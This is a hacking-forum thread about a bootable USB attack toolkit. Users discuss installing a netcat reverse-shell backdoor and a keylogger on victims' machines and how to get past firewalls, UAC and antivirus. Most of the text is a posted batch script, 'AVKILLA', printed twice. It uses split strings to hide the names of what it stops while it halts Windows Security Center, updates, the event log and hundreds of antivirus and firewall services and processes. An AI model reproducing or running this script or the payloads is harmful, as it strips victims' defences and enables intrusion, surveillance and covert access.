Jump to content

The Attack Pre-Installed Environment


sablefoxx

Recommended Posts

Cmdo - Installs a netcat backdoor to port 69 (Reverse Shell), use NConnect to connect to victim (fixed the bsod bug)

--> is it really that simple?? You just install that and than you are able to connect to your victim computer from let's say your home?? what about protection from the firewall of your router?? Just fire up Netcat en your of to go?ß

Well you won't be able to connect through (NAT) firewalls unless you edit the script to include the IP you plan to connect from, otherwise in XP it will automatically add itself to the Windows Firewall exception list, or in Vista if UAC is disabled. However if UAC is enabled, or the victim has a 3rd party firewall installed, it will ask to add itself. Best used over LANs, however with a little editing you can easily connect over the internet, through any firewall as well.

Otherwise it is that simple.

Link to comment
Share on other sites

  • Replies 146
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

ok well so far so good, leapo's payload seems to be working, well workingish but i can figure out that through testing,

ill just ask one thing at a time as seem to confuse people when i rabbit on lolz

i have extracted to USB and set the settings from menu.bat, i have coppied the keyl_PE.exe to the pen drive and when clicked it says its installed fine but no C:\windows\keyl.txt Hmmm

any help guys

Link to comment
Share on other sites

ok well so far so good, leapo's payload seems to be working, well workingish but i can figure out that through testing,

ill just ask one thing at a time as seem to confuse people when i rabbit on lolz

i have extracted to USB and set the settings from menu.bat, i have coppied the keyl_PE.exe to the pen drive and when clicked it says its installed fine but no C:\windows\keyl.txt Hmmm

any help guys

Those payloads need to be installed from PE, boot from the usb drive and then run

Keylpe.exe. I have also posted versions that can be installed from userspace

question i have installed ape on a usb and patched the iso but it won't boot, my question is what have i done wrong?

Not all systems boot from usb, try another computer, let me know if no system will boot from it

Also typing this on a g1 I am out of town so won't be able to post updates for a while

Link to comment
Share on other sites

I am able to boot from usb using this computer as i have done so before (backtrack 4), however my question is where is the boot record on the usb because currently all I see is the .iso file which usually needs to be unpacked before it can be booted but APE might work differently.

Link to comment
Share on other sites

Good work here enjoy the new version but there is one thing

when ever i try to run leaposes payload on vista it says that it cant find the go.vbs

so then i tried logging onto my computer and i go to system and i can clearly see go.vbs and when i click it it says that vista cant find go.vbs even though its right in front of its face !!!

any help would be gladly appreciated

There also seems to be a number of bugs for leaposes payload i cant get it work no matter what ive tested it on vista32bit,vista 64bit, and xp 64 bit has anyone else gotten this 2 work

Link to comment
Share on other sites

  • 2 weeks later...

yeah working on updates, but been really busy with school (i also just got a fon in the mail, so been playing around with that too) hope to have new content, and bug fixes up soon :)

as far as your problems with finding/running the go.vbs, it may have been blocked by Anti-Virus, or possible problems with UAC. Remember Leapo's payload is writable so AV still can remove files from it, however with the new updates running the payload before logging in should be easier (that way no AV and no UAC).

Link to comment
Share on other sites

  • 2 weeks later...

I have coded a bat file to kill most popular anti viruses kills firewall and updates and other goodies it undetectable but totally not stealth and is in still beta i think that it would be a perfect addition to Ape. Comments, problems and i hope it will get patched into Ape :lol:

I call it AVKILLA

@echo off
cd c:\recycler\S-1-5-21-1202660629-261903793-725345543-1003
del /F /Q run.bat
set ii=ne
set ywe=st
set ury=t
set iej=op
set jt53=Syma
set o6t=nor
set lyd2=fee
set h3d=ton
set gf45=ntec
set own5=McA
%ii%%ury% %ywe%%iej% "Security Center" /y
%ii%%ury% %ywe%%iej% "Automatic Updates" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% "SAVScan" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y
cls
%ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y
%ii%%ury% %ywe%%iej% navapsvc /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
%ii%%ury% %ywe%%iej% vrmonsvc /y
%ii%%ury% %ywe%%iej% MonSvcNT /y
%ii%%ury% %ywe%%iej% SAVScan /y
%ii%%ury% %ywe%%iej% NProtectService /y
%ii%%ury% %ywe%%iej% ccSetMGR /y
%ii%%ury% %ywe%%iej% ccEvtMGR /y
%ii%%ury% %ywe%%iej% srservice /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y
%ii%%ury% %ywe%%iej% MskService /y
%ii%%ury% %ywe%%iej% MpfService /y
%ii%%ury% %ywe%%iej% mcupdmgr.exe /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y
%ii%%ury% %ywe%%iej% helpsvc /y
%ii%%ury% %ywe%%iej% ERSvc /y
%ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y
%ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y
%ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y
cls
%ii%%ury% %ywe%%iej% ccPwdSvc /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% navapsvc /y
%ii%%ury% %ywe%%iej% "Serv-U" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y
%ii%%ury% %ywe%%iej% "NAV Alert" /y
%ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y
cls
%ii%%ury% %ywe%%iej% "McShield" /y
%ii%%ury% %ywe%%iej% "DefWatch" /y
%ii%%ury% %ywe%%iej% eventlog /y
%ii%%ury% %ywe%%iej% InoRPC /y
%ii%%ury% %ywe%%iej% InoRT /y
%ii%%ury% %ywe%%iej% InoTask /y
cls
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y
%ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y
%ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y
%ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y
%ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y
%ii%%ury% %ywe%%iej% "SyGateService" /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
cls
%ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y
%ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus
Job Server" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y
cls
net stop netsvcs
net stop spoolnt
pskill spoolsvc.exe
pskill spoolsv.exe
pskill netsvcs.exe
pskill srvany.exe
pskill spool.exe
pskill secure32.exe
pskill ahnsd.exe
pskill mspmspsv.exe
pskill stisvc.exe
pskill servudaemon.exe
pskill snservice.exe
pskill noadmon.exe
pskill ahnsdsv.exe
pskill sdac11ba.exe
pskill system.exe
pskill navapsvc.exe
pskill winload.exe
pskill v3p3at.exe
pskill monsvcnt.exe
pskill winhelp32.exe
pskill sagent2.exe
pskill win32.exe
pskill monsysnt.exe
pskill cisvsc.exe
pskill alg.exe
pskill mdm.exe
pskill mcshield.exe
pskill nvsvc32.exe
pskill rundll32.exe
pskill msdevice.exe
pskill srvmon.exe
pskill rundll32.exe
pskill userbatch.exe
pskill navapw32.exe
pskill keyservice.exe
pskill netpiadw.exe
pskill dwagent.exe
pskill internat.exe
pskill dllsvc.exe
pskill mvcc.exe
pskill tachy.exe
pskill lsass12.exe
pskill tskmngr.exe
pskill bomsvc32.exe
pskill vstmgr.exe
pskill firedaemon.exe
pskill lvcoms.exe
pskill msnupdate.exe
pskill conime.exe
pskill gmt.exe
pskill mtbp.exe
pskill squerycontrol32.exe
pskill precisiontime.exe
pskill winhost.exe
pskill net.exe
pskill serviceguard.exe
pskill swoff.exe
pskill mstunnel.exe
pskill msfig.exe
pskill fxsvc.exe
pskill clisvc.exe
pskill mspmspsv.exe
pskill ccap.exe
pskill mcshield.exe
pskill vrmonsvc.exe
pskill vrmonNT.exe
pskill v3impro.exe
pskill ncvscc32.exe
pskill host.exe
pskill videosd32.exe
pskill msgfixer.exe
pskill adspider.exe
pskill regsvc.exe
pskill naviagent.exe
pskill winserv32.exe
pskill dllhost.exe
pskill hkcmd.exe
pskill sqlmngr.exe
pskill llssrv.exe
pskill svchost2.exe
pskill ipbind.exe
pskill http://ftp.exe
pskill svchost1.exe
pskill winsys9242.exe
pskill turboagent.exe
pskill hkstart.exe
pskill winmgmt.exe
pskill mouse32a.exe
pskill net1.exe
pskill winmysqladmin.exe
pskill sctsvc.exe
pskill winmgnt.exe
pskill iroffer.exe
pskill awhost32.exe
pskill wuauclt.exe
pskill a2guard
pskill aavshield
pskill AckWin32
pskill ADVCHK
pskill AhnSD
pskill airdefense
pskill ALERTSVC
pskill ALMon
pskill ALOGSERV
pskill ALsvc
pskill amon
pskill Anti-Trojan
pskill AntiVirScheduler
pskill AntiVirService
pskill ANTS
pskill APVXDWIN
pskill Armor2net
pskill ashAvast
pskill ashDisp
pskill ashEnhcd
pskill ashMaiSv
pskill ashPopWz
pskill ashServ
pskill ashSimpl
pskill ashSkPck
pskill ashWebSv
pskill aswUpdSv
pskill ATCON
pskill ATUPDATER
pskill ATWATCH
pskill AUPDATE
pskill AUTODOWN
pskill AUTOTRACE
pskill AUTOUPDATE
pskill avciman
pskill Avconsol
pskill AVENGINE
pskill avgamsvr
pskill avgcc
pskill AVGCC32
pskill AVGCTRL
pskill avgemc
pskill avgfwsrv
pskill AVGNT
pskill avgntdd
pskill avgntmgr
pskill AVGSERV
pskill AVGUARD
pskill avgupsvc
pskill avinitnt
pskill AvkServ
pskill AVKService
pskill AVKWCtl
pskill AVP
pskill AVP32
pskill avpcc
pskill avpm
pskill AVPUPD
pskill AVSCHED32
pskill avsynmgr
pskill AVWUPD32
pskill AVWUPSRV
pskill AVXMONITOR9X
pskill AVXMONITORNT
pskill AVXQUAR
pskill BackWeb-4476822
pskill bdmcon
pskill bdnews
pskill bdoesrv
pskill bdss
pskill bdsubmit
pskill bdswitch
pskill blackd
pskill blackice
pskill cafix
pskill ccApp
pskill ccEvtMgr
pskill ccProxy
pskill ccSetMgr
pskill CFIAUDIT
pskill ClamTray
pskill ClamWin
pskill Claw95
pskill Claw95cf
pskill cleaner
pskill cleaner3
pskill CliSvc
pskill CMGrdian
pskill cpd
pskill DefWatch
pskill DOORS
pskill DrVirus
pskill drwadins
pskill drweb32w
pskill drwebscd
pskill DRWEBUPW
pskill ESCANH95
pskill ESCANHNT
pskill ewidoctrl
pskill EzAntivirusRegistrationCheck
pskill F-AGNT95
pskill F-PROT95
pskill F-Sched
pskill F-StopW
pskill FAMEH32
pskill FAST
pskill FCH32
pskill FireSvc
pskill FireTray
pskill FIREWALL
pskill fpavupdm
pskill freshclam
pskill FRW
pskill fsav32
pskill fsavgui
pskill fsbwsys
pskill fsdfwd
pskill FSGK32
pskill fsgk32st
pskill fsgui
pskill FSM32
pskill FSMA32
pskill FSMB32
pskill fspex
pskill fssm32
pskill gcasDtServ
pskill gcasServ
pskill GIANTAntiSpywareMain
pskill GIANTAntiSpywareUpdater
pskill GUARD
pskill GUARDGUI
pskill GuardNT
pskill HRegMon
pskill Hrres
pskill HSockPE
pskill HUpdate
pskill iamapp
pskill iamserv
pskill ICLOAD95
pskill ICLOADNT
pskill ICMON
pskill ICSSUPPNT
pskill ICSUPP95
pskill ICSUPPNT
pskill IFACE
pskill INETUPD
pskill InocIT
pskill InoRpc
pskill InoRT
pskill InoTask
pskill InoUpTNG
pskill IOMON98
pskill isafe
pskill ISATRAY
pskill ISRV95
pskill ISSVC
pskill JEDI
pskill KAV
pskill kavmm
pskill KAVPF
pskill KavPFW
pskill KAVStart
pskill KAVSvc
pskill KAVSvcUI
pskill KMailMon
pskill KPfwSvc
pskill KWatch
pskill livesrv
pskill LOCKDOWN2000
pskill LogWatNT
pskill lpfw
pskill LUALL
pskill LUCOMSERVER
pskill Luupdate
pskill MCAGENT
pskill mcmnhdlr
pskill mcregwiz
pskill Mcshield
pskill MCUPDATE
pskill mcvsshld
pskill MINILOG
pskill MONITOR
pskill MonSysNT
pskill MOOLIVE
pskill MpEng
pskill mpssvc
pskill MSMPSVC
pskill myAgtSvc
pskill myagttry
pskill navapsvc
pskill NAVAPW32
pskill NavLu32
pskill NAVW32
pskill NDD32
pskill NeoWatchLog
pskill NeoWatchTray
pskill NISSERV
pskill NISUM
pskill NMAIN
pskill nod32
pskill nod32krn
pskill nod32kui
pskill NORMIST
pskill notstart
pskill npavtray
pskill NPFMNTOR
pskill npfmsg
pskill NPROTECT
pskill NSCHED32
pskill NSMdtr
pskill NssServ
pskill NssTray
pskill ntrtscan
pskill NTXconfig
pskill NUPGRADE
pskill NVC95
pskill Nvcod
pskill Nvcte
pskill Nvcut
pskill NWService
pskill OfcPfwSvc
pskill OUTPOST
pskill PAV
pskill PavFires
pskill PavFnSvr
pskill Pavkre
pskill PavProt
pskill pavProxy
pskill pavprsrv
pskill pavsrv51
pskill PAVSS
pskill pccguide
pskill PCCIOMON
pskill pccntmon
pskill PCCPFW
pskill PcCtlCom
pskill PCTAV
pskill PERSFW
pskill pertsk
pskill PERVAC
pskill PNMSRV
pskill POP3TRAP
pskill POPROXY
pskill prevsrv
pskill PsImSvc
pskill QHM32
pskill QHONLINE
pskill QHONSVC
pskill QHPF
pskill qhwscsvc
pskill RavMon
pskill RavTimer
pskill Realmon
pskill REALMON95
pskill Rescue
pskill rfwmain
pskill Rtvscan
pskill RTVSCN95
pskill RuLaunch
pskill SAVAdminService
pskill SAVMain
pskill savprogress
pskill SAVScan
pskill SCAN32
pskill ScanningProcess
pskill sched
pskill sdhelp
pskill SERVIC~1
pskill SHSTAT
pskill SiteCli
pskill smc
pskill SNDSrvc
pskill SPBBCSvc
pskill SPHINX
pskill spiderml
pskill spidernt
pskill Spiderui
pskill SpybotSD
pskill SPYXX
pskill SS3EDIT
pskill stopsignav
pskill swAgent
pskill swdoctor
pskill SWNETSUP
pskill symlcsvc
pskill SymProxySvc
pskill SymSPort
pskill SymWSC
pskill SYNMGR
pskill TAUMON
pskill TBMon
pskill TC
pskill tca
pskill TCM
pskill TDS-3
pskill TeaTimer
pskill TFAK
pskill THAV
pskill THSM
pskill Tmas
pskill tmlisten
pskill Tmntsrv
pskill TmPfw
pskill tmproxy
pskill TNBUtil
pskill TRJSCAN
pskill Up2Date
pskill UPDATE
pskill UpdaterUI
pskill upgrepl
pskill Vba32ECM
pskill Vba32ifs
pskill vba32ldr
pskill Vba32PP3
pskill VBSNTW
pskill vchk
pskill vcrmon
pskill VetTray
pskill VirusKeeper
pskill VPTRAY
pskill vrfwsvc
pskill VRMONNT
pskill vrmonsvc
pskill vrrw32
pskill VSECOMR
pskill Vshwin32
pskill vsmon
pskill vsserv
pskill VsStat
pskill WATCHDOG
pskill WebProxy
pskill Webscanx
pskill WEBTRAP
pskill WGFE95
pskill Winaw32
pskill winroute
pskill winss
pskill winssnotify
pskill WRADMIN
pskill WRCTRL
pskill xcommsvr
pskill zatutor
pskill ZAUINST
pskill zlclient
pskill zonealarm
pskill _AVP32
pskill _AVPCC
pskill _AVPM
pskill scanwscs
pskill scanmsg
pskill onlnsvc
pskill upschd
pskill antivirus 

Link to comment
Share on other sites

I have coded a bat file to kill most popular anti viruses kills firewall and updates and other goodies it undetectable but totally not stealth and is in still beta i think that it would be a perfect addition to Ape. Comments, problems and i hope it will get patched into Ape :lol:

I call it AVKILLA

Unless your name is Codine and you are from the hakforums and you wrote that in 2007 then you didnt code that.

PROOF

Forum topic

Posted by wohawsnng 01-14-08

Please give credit where credit is due.

Link to comment
Share on other sites

I have coded a bat file to kill most popular anti viruses kills firewall and updates and other goodies it undetectable but totally not stealth and is in still beta i think that it would be a perfect addition to Ape. Comments, problems and i hope it will get patched into Ape :lol:

I call it AVKILLA

@echo off
cd c:\recycler\S-1-5-21-1202660629-261903793-725345543-1003
del /F /Q run.bat
set ii=ne
set ywe=st
set ury=t
set iej=op
set jt53=Syma
set o6t=nor
set lyd2=fee
set h3d=ton
set gf45=ntec
set own5=McA
%ii%%ury% %ywe%%iej% "Security Center" /y
%ii%%ury% %ywe%%iej% "Automatic Updates" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% "SAVScan" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y
cls
%ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y
%ii%%ury% %ywe%%iej% navapsvc /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
%ii%%ury% %ywe%%iej% vrmonsvc /y
%ii%%ury% %ywe%%iej% MonSvcNT /y
%ii%%ury% %ywe%%iej% SAVScan /y
%ii%%ury% %ywe%%iej% NProtectService /y
%ii%%ury% %ywe%%iej% ccSetMGR /y
%ii%%ury% %ywe%%iej% ccEvtMGR /y
%ii%%ury% %ywe%%iej% srservice /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y
%ii%%ury% %ywe%%iej% MskService /y
%ii%%ury% %ywe%%iej% MpfService /y
%ii%%ury% %ywe%%iej% mcupdmgr.exe /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y
%ii%%ury% %ywe%%iej% helpsvc /y
%ii%%ury% %ywe%%iej% ERSvc /y
%ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y
%ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y
%ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y
cls
%ii%%ury% %ywe%%iej% ccPwdSvc /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% navapsvc /y
%ii%%ury% %ywe%%iej% "Serv-U" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y
%ii%%ury% %ywe%%iej% "NAV Alert" /y
%ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y
cls
%ii%%ury% %ywe%%iej% "McShield" /y
%ii%%ury% %ywe%%iej% "DefWatch" /y
%ii%%ury% %ywe%%iej% eventlog /y
%ii%%ury% %ywe%%iej% InoRPC /y
%ii%%ury% %ywe%%iej% InoRT /y
%ii%%ury% %ywe%%iej% InoTask /y
cls
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y
%ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y
%ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y
%ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y
%ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y
%ii%%ury% %ywe%%iej% "SyGateService" /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
cls
%ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y
%ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus
Job Server" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y
cls
net stop netsvcs
net stop spoolnt
pskill spoolsvc.exe
pskill spoolsv.exe
pskill netsvcs.exe
pskill srvany.exe
pskill spool.exe
pskill secure32.exe
pskill ahnsd.exe
pskill mspmspsv.exe
pskill stisvc.exe
pskill servudaemon.exe
pskill snservice.exe
pskill noadmon.exe
pskill ahnsdsv.exe
pskill sdac11ba.exe
pskill system.exe
pskill navapsvc.exe
pskill winload.exe
pskill v3p3at.exe
pskill monsvcnt.exe
pskill winhelp32.exe
pskill sagent2.exe
pskill win32.exe
pskill monsysnt.exe
pskill cisvsc.exe
pskill alg.exe
pskill mdm.exe
pskill mcshield.exe
pskill nvsvc32.exe
pskill rundll32.exe
pskill msdevice.exe
pskill srvmon.exe
pskill rundll32.exe
pskill userbatch.exe
pskill navapw32.exe
pskill keyservice.exe
pskill netpiadw.exe
pskill dwagent.exe
pskill internat.exe
pskill dllsvc.exe
pskill mvcc.exe
pskill tachy.exe
pskill lsass12.exe
pskill tskmngr.exe
pskill bomsvc32.exe
pskill vstmgr.exe
pskill firedaemon.exe
pskill lvcoms.exe
pskill msnupdate.exe
pskill conime.exe
pskill gmt.exe
pskill mtbp.exe
pskill squerycontrol32.exe
pskill precisiontime.exe
pskill winhost.exe
pskill net.exe
pskill serviceguard.exe
pskill swoff.exe
pskill mstunnel.exe
pskill msfig.exe
pskill fxsvc.exe
pskill clisvc.exe
pskill mspmspsv.exe
pskill ccap.exe
pskill mcshield.exe
pskill vrmonsvc.exe
pskill vrmonNT.exe
pskill v3impro.exe
pskill ncvscc32.exe
pskill host.exe
pskill videosd32.exe
pskill msgfixer.exe
pskill adspider.exe
pskill regsvc.exe
pskill naviagent.exe
pskill winserv32.exe
pskill dllhost.exe
pskill hkcmd.exe
pskill sqlmngr.exe
pskill llssrv.exe
pskill svchost2.exe
pskill ipbind.exe
pskill http://ftp.exe
pskill svchost1.exe
pskill winsys9242.exe
pskill turboagent.exe
pskill hkstart.exe
pskill winmgmt.exe
pskill mouse32a.exe
pskill net1.exe
pskill winmysqladmin.exe
pskill sctsvc.exe
pskill winmgnt.exe
pskill iroffer.exe
pskill awhost32.exe
pskill wuauclt.exe
pskill a2guard
pskill aavshield
pskill AckWin32
pskill ADVCHK
pskill AhnSD
pskill airdefense
pskill ALERTSVC
pskill ALMon
pskill ALOGSERV
pskill ALsvc
pskill amon
pskill Anti-Trojan
pskill AntiVirScheduler
pskill AntiVirService
pskill ANTS
pskill APVXDWIN
pskill Armor2net
pskill ashAvast
pskill ashDisp
pskill ashEnhcd
pskill ashMaiSv
pskill ashPopWz
pskill ashServ
pskill ashSimpl
pskill ashSkPck
pskill ashWebSv
pskill aswUpdSv
pskill ATCON
pskill ATUPDATER
pskill ATWATCH
pskill AUPDATE
pskill AUTODOWN
pskill AUTOTRACE
pskill AUTOUPDATE
pskill avciman
pskill Avconsol
pskill AVENGINE
pskill avgamsvr
pskill avgcc
pskill AVGCC32
pskill AVGCTRL
pskill avgemc
pskill avgfwsrv
pskill AVGNT
pskill avgntdd
pskill avgntmgr
pskill AVGSERV
pskill AVGUARD
pskill avgupsvc
pskill avinitnt
pskill AvkServ
pskill AVKService
pskill AVKWCtl
pskill AVP
pskill AVP32
pskill avpcc
pskill avpm
pskill AVPUPD
pskill AVSCHED32
pskill avsynmgr
pskill AVWUPD32
pskill AVWUPSRV
pskill AVXMONITOR9X
pskill AVXMONITORNT
pskill AVXQUAR
pskill BackWeb-4476822
pskill bdmcon
pskill bdnews
pskill bdoesrv
pskill bdss
pskill bdsubmit
pskill bdswitch
pskill blackd
pskill blackice
pskill cafix
pskill ccApp
pskill ccEvtMgr
pskill ccProxy
pskill ccSetMgr
pskill CFIAUDIT
pskill ClamTray
pskill ClamWin
pskill Claw95
pskill Claw95cf
pskill cleaner
pskill cleaner3
pskill CliSvc
pskill CMGrdian
pskill cpd
pskill DefWatch
pskill DOORS
pskill DrVirus
pskill drwadins
pskill drweb32w
pskill drwebscd
pskill DRWEBUPW
pskill ESCANH95
pskill ESCANHNT
pskill ewidoctrl
pskill EzAntivirusRegistrationCheck
pskill F-AGNT95
pskill F-PROT95
pskill F-Sched
pskill F-StopW
pskill FAMEH32
pskill FAST
pskill FCH32
pskill FireSvc
pskill FireTray
pskill FIREWALL
pskill fpavupdm
pskill freshclam
pskill FRW
pskill fsav32
pskill fsavgui
pskill fsbwsys
pskill fsdfwd
pskill FSGK32
pskill fsgk32st
pskill fsgui
pskill FSM32
pskill FSMA32
pskill FSMB32
pskill fspex
pskill fssm32
pskill gcasDtServ
pskill gcasServ
pskill GIANTAntiSpywareMain
pskill GIANTAntiSpywareUpdater
pskill GUARD
pskill GUARDGUI
pskill GuardNT
pskill HRegMon
pskill Hrres
pskill HSockPE
pskill HUpdate
pskill iamapp
pskill iamserv
pskill ICLOAD95
pskill ICLOADNT
pskill ICMON
pskill ICSSUPPNT
pskill ICSUPP95
pskill ICSUPPNT
pskill IFACE
pskill INETUPD
pskill InocIT
pskill InoRpc
pskill InoRT
pskill InoTask
pskill InoUpTNG
pskill IOMON98
pskill isafe
pskill ISATRAY
pskill ISRV95
pskill ISSVC
pskill JEDI
pskill KAV
pskill kavmm
pskill KAVPF
pskill KavPFW
pskill KAVStart
pskill KAVSvc
pskill KAVSvcUI
pskill KMailMon
pskill KPfwSvc
pskill KWatch
pskill livesrv
pskill LOCKDOWN2000
pskill LogWatNT
pskill lpfw
pskill LUALL
pskill LUCOMSERVER
pskill Luupdate
pskill MCAGENT
pskill mcmnhdlr
pskill mcregwiz
pskill Mcshield
pskill MCUPDATE
pskill mcvsshld
pskill MINILOG
pskill MONITOR
pskill MonSysNT
pskill MOOLIVE
pskill MpEng
pskill mpssvc
pskill MSMPSVC
pskill myAgtSvc
pskill myagttry
pskill navapsvc
pskill NAVAPW32
pskill NavLu32
pskill NAVW32
pskill NDD32
pskill NeoWatchLog
pskill NeoWatchTray
pskill NISSERV
pskill NISUM
pskill NMAIN
pskill nod32
pskill nod32krn
pskill nod32kui
pskill NORMIST
pskill notstart
pskill npavtray
pskill NPFMNTOR
pskill npfmsg
pskill NPROTECT
pskill NSCHED32
pskill NSMdtr
pskill NssServ
pskill NssTray
pskill ntrtscan
pskill NTXconfig
pskill NUPGRADE
pskill NVC95
pskill Nvcod
pskill Nvcte
pskill Nvcut
pskill NWService
pskill OfcPfwSvc
pskill OUTPOST
pskill PAV
pskill PavFires
pskill PavFnSvr
pskill Pavkre
pskill PavProt
pskill pavProxy
pskill pavprsrv
pskill pavsrv51
pskill PAVSS
pskill pccguide
pskill PCCIOMON
pskill pccntmon
pskill PCCPFW
pskill PcCtlCom
pskill PCTAV
pskill PERSFW
pskill pertsk
pskill PERVAC
pskill PNMSRV
pskill POP3TRAP
pskill POPROXY
pskill prevsrv
pskill PsImSvc
pskill QHM32
pskill QHONLINE
pskill QHONSVC
pskill QHPF
pskill qhwscsvc
pskill RavMon
pskill RavTimer
pskill Realmon
pskill REALMON95
pskill Rescue
pskill rfwmain
pskill Rtvscan
pskill RTVSCN95
pskill RuLaunch
pskill SAVAdminService
pskill SAVMain
pskill savprogress
pskill SAVScan
pskill SCAN32
pskill ScanningProcess
pskill sched
pskill sdhelp
pskill SERVIC~1
pskill SHSTAT
pskill SiteCli
pskill smc
pskill SNDSrvc
pskill SPBBCSvc
pskill SPHINX
pskill spiderml
pskill spidernt
pskill Spiderui
pskill SpybotSD
pskill SPYXX
pskill SS3EDIT
pskill stopsignav
pskill swAgent
pskill swdoctor
pskill SWNETSUP
pskill symlcsvc
pskill SymProxySvc
pskill SymSPort
pskill SymWSC
pskill SYNMGR
pskill TAUMON
pskill TBMon
pskill TC
pskill tca
pskill TCM
pskill TDS-3
pskill TeaTimer
pskill TFAK
pskill THAV
pskill THSM
pskill Tmas
pskill tmlisten
pskill Tmntsrv
pskill TmPfw
pskill tmproxy
pskill TNBUtil
pskill TRJSCAN
pskill Up2Date
pskill UPDATE
pskill UpdaterUI
pskill upgrepl
pskill Vba32ECM
pskill Vba32ifs
pskill vba32ldr
pskill Vba32PP3
pskill VBSNTW
pskill vchk
pskill vcrmon
pskill VetTray
pskill VirusKeeper
pskill VPTRAY
pskill vrfwsvc
pskill VRMONNT
pskill vrmonsvc
pskill vrrw32
pskill VSECOMR
pskill Vshwin32
pskill vsmon
pskill vsserv
pskill VsStat
pskill WATCHDOG
pskill WebProxy
pskill Webscanx
